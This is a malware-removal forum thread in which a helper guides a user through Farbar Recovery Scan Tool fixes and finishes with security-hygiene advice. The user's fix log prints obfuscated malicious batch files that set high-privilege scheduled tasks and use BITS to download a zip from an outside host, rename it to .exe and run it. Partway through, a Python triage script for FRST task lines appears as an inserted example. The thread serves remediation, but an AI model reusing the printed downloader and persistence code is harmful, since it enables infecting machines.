    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 11:01 AM

Thank you. The file from the link you PM'd me didn't have anything malicious in it. Any ideas of what else you downloaded and installed? Maybe around January 3rd? In the last week.

Also, follow the instructions below.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply


Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 11:51 AM

Really? That's weird, I'll resend you a link on the site itself. I haven't really installed anything else other than Malwarebytes, ADWcleaner and HitmanPro.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by ouroboros (06-01-2018 00:34:11) Run:2
Running from C:\Users\ouroboros\Desktop
Loaded Profiles: ouroboros (Available Profiles: ouroboros & Visitor)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
cmd: type C:\WINDOWS\SysWOW64\eYyo.bat
cmd: type C:\WINDOWS\aVPIeFZA.bat
cmd: type "C:\Program Files (x86)\Common Files\EnAWI.bat"
cmd: type "C:\Program Files (x86)\Common Files\rYms.bat"
 
C:\Program Files (x86)\Common Files\EnAWI
C:\Program Files (x86)\Common Files\rYms
C:\Program Files (x86)\Common Files\rYms.bat
C:\Program Files (x86)\Common Files\EnAWI.bat
C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
C:\ProgramData\boost_interprocess
C:\ProgramData\ntuser.pol
C:\Users\OUROBO~1\AppData\Local\447123~1
C:\Users\OUROBO~1\AppData\Local\Geburo
C:\Users\ouroboros\AppData\Local\lptx123456
C:\Users\ouroboros\AppData\Local\HvpjdXLztn
C:\Users\ouroboros\AppData\Roaming\sp_data.sys
C:\WINDOWS\aVPIeFZA
C:\WINDOWS\aVPIeFZA.bat
C:\WINDOWS\SysWOW64\eYyo
C:\WINDOWS\SysWOW64\eYyo.bat
C:\WINDOWS\SysWOW64\iYWHkUpEd.exe
 
Task: {55A4A116-810E-4EB9-A283-07E1A4D4A39A} - System32\Tasks\aoIYY => C:\WINDOWS\aVPIeFZA.bat [2017-09-29] () <==== ATTENTION
Task: {6AFEEB9D-E977-4D4F-945F-B58706D58EA5} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {7318097E-EEA3-45E5-BFFB-A5D4ADD83F88} - System32\Tasks\RfumFuaEoEEe => C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
Task: {B06EB407-984B-416E-BC49-D27A42D3E333} - \{6FEFFD84-0D29-0B78-4530-415A173AA131} -> No File <==== ATTENTION
Task: {C0619711-DDB5-4844-B929-881F36A1C478} - System32\Tasks\ouroborosNobbleAbsorbsV2 => rundll32.exe NonrealisticPredefining.dll,main 7 1 <==== ATTENTION
Task: {D72EA3C5-389F-471C-9E8C-99DAD5F11C61} - System32\Tasks\Jasic => C:\Program Files (x86)\Common Files\rYms.bat [2017-09-29] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => C:\Users\OUROBO~1\AppData\Local\447123~1\Sync.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => C:\Users\OUROBO~1\AppData\Local\Geburo\SYNCVE~1.EXE
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Chromium"
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
 
========= type C:\WINDOWS\SysWOW64\eYyo.bat =========
 
@echo off
c%EvJEau%opy /y "C%YaTrEKy%:\Program Fi%OgeASqig%le%WhkNRO%s (%hUoWTUJyORr%x%YAOBcIaoyDV%86)\Com%usiDOFOEqpk%mon Files\EnAWI%IWNVMH%" "C:\P%PuoduodPtVk%rogram Files (%uYycaNAaiNA%x%uTcryoEEFBUg%86)%ehHYaL%\Comm%IpnyCXoY%o%vHkOMa%n Files\%wIuaqzjomnMiz%E%MrUc%nAWI.bat"
c LUoIiaOyQs%opy /y "C:\WIND%UZAFeWee%OWS\aVPI%oUAZSlUCi%eFZA" "C:\WINDOWS\aVPIeFZA.bat"
s%oyaOuVeO%chtasks /create /tn "aoIYY" /tr "'C:\W%uhOOVNuyXYt%INDOWS\aVPIeFZA.bat%GvFyd%' " /sc ONLO%ZUsiSXoo%GON /delay 0003:0%fYaKZBU%0 /rl highest /f
set Ao%RIiDeU%AOVihobooII=%rAndOM%%RAnDOM%
"C:\WI%IQRZfVdIFoMUa%NDOWS\SysWOW64\iYWHkUpEd.ex%zdAOK%e" /TRansFEr AOEFyIlPo /DownLOad /%tXqUxiaIsv%priOrITy hIgh
rena%VIhaYuEk%me "C:\Users\O%yOlUiyrv%UROBO~1\%YuieDgtkD%Ap%EcUAIczvV%pData\%QIiIOY%Loca%OyPEFS%l\Temp\xeMP%ILWuDyqIoZRi%LYUIaEY.z%pBeTEuA%ip" %AoAOVihobooII%.%IIIaiuN%exe
cmd /c ""C:\Users\%iEeECyU%OUROBO~1\%QwdyOOyOnHuK%AppData\L%AuyaUGiea%ocal\Temp\%AoAOVihobooII%.%VOHnmY%exe" i"
========= End of CMD: =========
 
 
========= type C:\WINDOWS\aVPIeFZA.bat =========
 
start /min cmd /c "C:\Program Files (x86)\Common Files\EnAWI.bat"
exit
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\EnAWI.bat" =========
 
@%UUjUo%echo off
c%AYYkoAOEtU%opy /y "C%AuUF%:\WINDOWS\S%cURzmVlARh%ysWOW64\eYyo%BtAnAUfoa%" "C:\WIN%OuIY%DOW%TrIyBjdeZUIy%S\%qRGazIUoWteVl%SysWOW64%UHUoeAayP%\eYyo.bat%Iiqa%"
copy /y "%kYVoELeNXmuU%C:\P%MOoa%ro%SduEAd%gram Files (x86)\C%fuRAKR%ommon Files\r%JEEUgAXic%Yms" "C:\Program Files (%AWIIegeEx%x86)\Comm%iaAyYkOAo%on Files\r%FyHi%Yms.bat"
schtasks /create /t%gehIsIUegeHEy%n "Jasic" /tr "'C:\Program Files (x86)\Common Fi%qxyuEbn%les\rYms.bat' " /sc minute /m%kdOX%o 180 /rl high%maYpUGUIUmY%est /f
set M%ziAz%aEAYcWAhnEx=%RAndOm%%RaNdoM%
"C%dbEdiIsHkUtE%:\W%kCetooIOa%INDOWS\SysW%AIlDCAsEQAEi%OW6%MitS%4\iYWHkUpEd.%IYYQo%exe" /traNSfer hYWIOOKMUOU /%vYkqrOAye%DOWNL%oaXuuvhOUJOzI%OAd /%ooiT%prIo%uVUz%RitY HIGH http://fo%IJuuFuYAUxg%r%PayOluKqA%dingw.com/vg7y8r0xxq%Maviiot%x%xsfIEiadH%9.zip "C:\Users\O%eUAU%UROBO~1\AppData\%JOzxIoneHe%Local\Te%OoYDnUPBTY%mp\uHei.%elAXJZSOzOL%zip"%ILkUIEl%
rename "C:\%SPQWSo%Users\OUROBO~1\AppDa%uhIieeNTh%ta\Local\Temp\uHei.zip" %MaEAYcWAhnEx%.e%uizeeU%xe
cmd /c ""%DxiFq%C:\Users\OUROBO~1\AppData\L%yAkGUqJ%ocal%yBNcedIOETdUj%\Temp\%MaEAYcWAhnEx%.exe" i"
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\rYms.bat" =========
 
start /min cmd /c "C:\WINDOWS\SysWOW64\eYyo.bat"
exit
========= End of CMD: =========
 
C:\Program Files (x86)\Common Files\EnAWI => moved successfully
C:\Program Files (x86)\Common Files\rYms => moved successfully
C:\Program Files (x86)\Common Files\rYms.bat => moved successfully
C:\Program Files (x86)\Common Files\EnAWI.bat => moved successfully
"C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe" => not found
C:\ProgramData\boost_interprocess => moved successfully
C:\ProgramData\ntuser.pol => moved successfully
"C:\Users\OUROBO~1\AppData\Local\447123~1" => not found
"C:\Users\OUROBO~1\AppData\Local\Geburo" => not found
C:\Users\ouroboros\AppData\Local\lptx123456 => moved successfully
C:\Users\ouroboros\AppData\Local\HvpjdXLztn => moved successfully
C:\Users\ouroboros\AppData\Roaming\sp_data.sys => moved successfully
C:\WINDOWS\aVPIeFZA => moved successfully
C:\WINDOWS\aVPIeFZA.bat => moved successfully
C:\WINDOWS\SysWOW64\eYyo => moved successfully
C:\WINDOWS\SysWOW64\eYyo.bat => moved successfully
C:\WINDOWS\SysWOW64\iYWHkUpEd.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{55A4A116-810E-4EB9-A283-07E1A4D4A39A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55A4A116-810E-4EB9-A283-07E1A4D4A39A}" => removed successfully
C:\WINDOWS\System32\Tasks\aoIYY => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\aoIYY" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6AFEEB9D-E977-4D4F-945F-B58706D58EA5}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AFEEB9D-E977-4D4F-945F-B58706D58EA5}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7318097E-EEA3-45E5-BFFB-A5D4ADD83F88}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7318097E-EEA3-45E5-BFFB-A5D4ADD83F88}" => removed successfully
C:\WINDOWS\System32\Tasks\RfumFuaEoEEe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RfumFuaEoEEe" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B06EB407-984B-416E-BC49-D27A42D3E333}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B06EB407-984B-416E-BC49-D27A42D3E333}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6FEFFD84-0D29-0B78-4530-415A173AA131}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C0619711-DDB5-4844-B929-881F36A1C478}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0619711-DDB5-4844-B929-881F36A1C478}" => removed successfully
C:\WINDOWS\System32\Tasks\ouroborosNobbleAbsorbsV2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ouroborosNobbleAbsorbsV2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D72EA3C5-389F-471C-9E8C-99DAD5F11C61}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D72EA3C5-389F-471C-9E8C-99DAD5F11C61}" => removed successfully
C:\WINDOWS\System32\Tasks\Jasic => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Jasic" => removed successfully
C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => moved successfully
C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => moved successfully
"HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Chromium" => removed successfully
"HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Chromium" => not found
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15931719 B
Java, Flash, Steam htmlcache => 27651806 B
Windows/system/drivers => 959239 B
Edge => 0 B
Chrome => 444680241 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 2986 B
ouroboros => 15617521 B
Visitor => 0 B
 
RecycleBin => 0 B
EmptyTemp: => 490.2 MB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 00:35:00 ====
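The Fixlog above shows the persistence that the fix targeted: scheduled tasks launching batch files from system folders, a rundll32 task with a bare DLL name, an orphaned task and a legacy .job file pointing into AppData. As an added example (not code from this thread, from FRST or from the Malware Response Team), the Python script below parses FRST "Task:" lines and applies a few defender-side heuristics to each one, keeping FRST's own ATTENTION marker separate so the two opinions can be compared. The first six sample lines are copied from the Fixlog; the seventh is a constructed benign entry with a placeholder GUID; the rule names and the regular expressions are assumptions of this example, not FRST's format specification.

```python
r"""Triage helper for the 'Task:' lines in an FRST log (added example; not FRST's own code).

FRST prints registered tasks as
    Task: {GUID} - System32\Tasks\<name> => <command> [<date>] (<signer>) <==== ATTENTION
and legacy .job files as
    Task: C:\WINDOWS\Tasks\<name>.job => <command>
The heuristics below are this example's own; FRST's ATTENTION marker is tracked separately.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: the first six lines are copied from the Fixlog in this thread; the last one is
# a constructed benign entry (placeholder GUID) so the script has a negative case to run against.
SAMPLE_LINES = r"""
Task: {55A4A116-810E-4EB9-A283-07E1A4D4A39A} - System32\Tasks\aoIYY => C:\WINDOWS\aVPIeFZA.bat [2017-09-29] () <==== ATTENTION
Task: {6AFEEB9D-E977-4D4F-945F-B58706D58EA5} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {7318097E-EEA3-45E5-BFFB-A5D4ADD83F88} - System32\Tasks\RfumFuaEoEEe => C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
Task: {C0619711-DDB5-4844-B929-881F36A1C478} - System32\Tasks\ouroborosNobbleAbsorbsV2 => rundll32.exe NonrealisticPredefining.dll,main 7 1 <==== ATTENTION
Task: {D72EA3C5-389F-471C-9E8C-99DAD5F11C61} - System32\Tasks\Jasic => C:\Program Files (x86)\Common Files\rYms.bat [2017-09-29] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => C:\Users\OUROBO~1\AppData\Local\447123~1\Sync.exe <==== ATTENTION
Task: {00000000-0000-4000-8000-000000000000} - System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag => C:\WINDOWS\system32\defrag.exe -c -h -o -$ [2017-09-29] (Microsoft Corporation)
"""

TASK_RE = re.compile(
    r"^Task:\s+"
    r"(?:(?P<guid>\{[0-9A-Fa-f-]+\})\s+-\s+)?"   # GUID-registered tasks; .job lines have none
    r"(?P<name>.+?)\s+(?:=>|->)\s+"
    r"(?P<target>.+?)"
    r"(?P<attention>\s+<==== ATTENTION)?\s*$"
)
# Trailing "[YYYY-MM-DD] (signer)" that FRST appends when the target file exists on disk.
TAIL_RE = re.compile(r"\s*\[(?P<date>\d{4}-\d{2}-\d{2})\]\s*\((?P<signer>[^)]*)\)\s*$")
SCRIPT_RE = re.compile(r"\.(bat|cmd|vbs|js|ps1)(?=\s|$|')")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)


@dataclass
class TaskEntry:
    name: str
    target: str
    signer: Optional[str]          # None when FRST printed no "[date] (signer)" tail
    flagged_by_frst: bool
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings) or self.flagged_by_frst


def parse_task_line(line: str) -> Optional[TaskEntry]:
    """Return a TaskEntry for an FRST 'Task:' line, or None for any other line."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    target, signer = m.group("target"), None
    tail = TAIL_RE.search(target)
    if tail:
        signer = tail.group("signer").strip()
        target = target[: tail.start()].strip()
    return TaskEntry(name=m.group("name"), target=target, signer=signer,
                     flagged_by_frst=m.group("attention") is not None)


def assess(entry: TaskEntry) -> TaskEntry:
    """Apply this example's heuristics; each hit becomes a human-readable finding."""
    tgt, low = entry.target, entry.target.lower()
    if tgt == "No File":
        entry.findings.append("target missing (orphaned task)")
        return entry
    if SCRIPT_RE.search(low):
        entry.findings.append("launches a script rather than a signed binary")
    if low.startswith("rundll32"):
        parts = tgt.split(None, 1)
        dll = parts[1].split(",")[0] if len(parts) > 1 else ""
        if "\\" not in dll:
            entry.findings.append("rundll32 with bare DLL name (resolved via search path)")
    if USER_WRITABLE.search(tgt):
        entry.findings.append("target lives in a user-writable location")
    if entry.signer == "":
        entry.findings.append("no publisher signature reported by FRST")
    return entry


def triage(text: str) -> List[TaskEntry]:
    """Parse and assess every 'Task:' line in an FRST log excerpt."""
    return [assess(e) for e in map(parse_task_line, text.splitlines()) if e]


def report(text: str) -> str:
    lines = []
    for e in triage(text):
        lines.append(f"[{'!!' if e.suspicious else 'ok'}] {e.name} => {e.target}")
        lines.extend(f"       - {f}" for f in e.findings)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LINES))
```

Note that the RfumFuaEoEEe task (CyIPiOCiIR.exe under Common Files) trips none of these rules and was not marked by FRST either, yet it was still removed in the fix: heuristics like these narrow the list to review, they do not replace reading the log.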


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 11:53 AM

Got your PM, thank you :) Now, do you still get the CMD prompts on startup?



#9 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 12:33 PM

I didn't get any cmd prompts, I'll update you if it comes up again.

 

Thanks again Yoan, hopefully it's all fixed. 



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 06 January 2018 - 09:53 AM

Got your PM, thank you :)

Were there any other issues to address, or that was it?



#11 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 07 January 2018 - 08:55 PM

It's been three days and I haven't encountered any cmd pop-ups anymore. I think it's fixed.



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 08 January 2018 - 01:02 PM

Awesome!

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentioned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that make it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.

Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits, which are one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like Secunia PSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Antivirus, Antimalware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (led by an Antivirus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Antivirus

Antimalware

Firewall

Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • GlassWire - Has both a free and paid version (with different packages);
  • Windows Firewall Control - Gives you more control over your Windows Firewall;
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it;

Anti-Exploit/Anti-Ransomware

Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means installing extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc., but also you at the same time. Here are a few extensions that I recommend you install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome and Mozilla Firefox, called uBlock on Opera);
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera);
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser);
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers);
  • uMatrix: For advanced users, a point and click matrix-like extension that allows you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera);
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser);
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far fewer chances to get infected by malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices:

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back to this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread? :)



#13 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 10 January 2018 - 09:31 AM

# DelFix v1.013 - Logfile created 10/01/2018 at 22:31:16
# Updated 17/04/2016 by Xplode
# Username : ouroboros - ENJAY
# Operating System : Windows 10 Home Single Language  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\ouroboros\Desktop\Addition.txt
Deleted : C:\Users\ouroboros\Desktop\Fixlog.txt
Deleted : C:\Users\ouroboros\Desktop\FRST.txt
Deleted : C:\Users\ouroboros\Desktop\FRST64.exe
Deleted : C:\Users\ouroboros\Downloads\adwcleaner_7.0.6.0.exe
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #24 [Scheduled Checkpoint | 01/07/2018 06:16:56]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 10 January 2018 - 01:46 PM

Good! Any questions before I close your thread? :)



#15 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 12 January 2018 - 08:20 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.





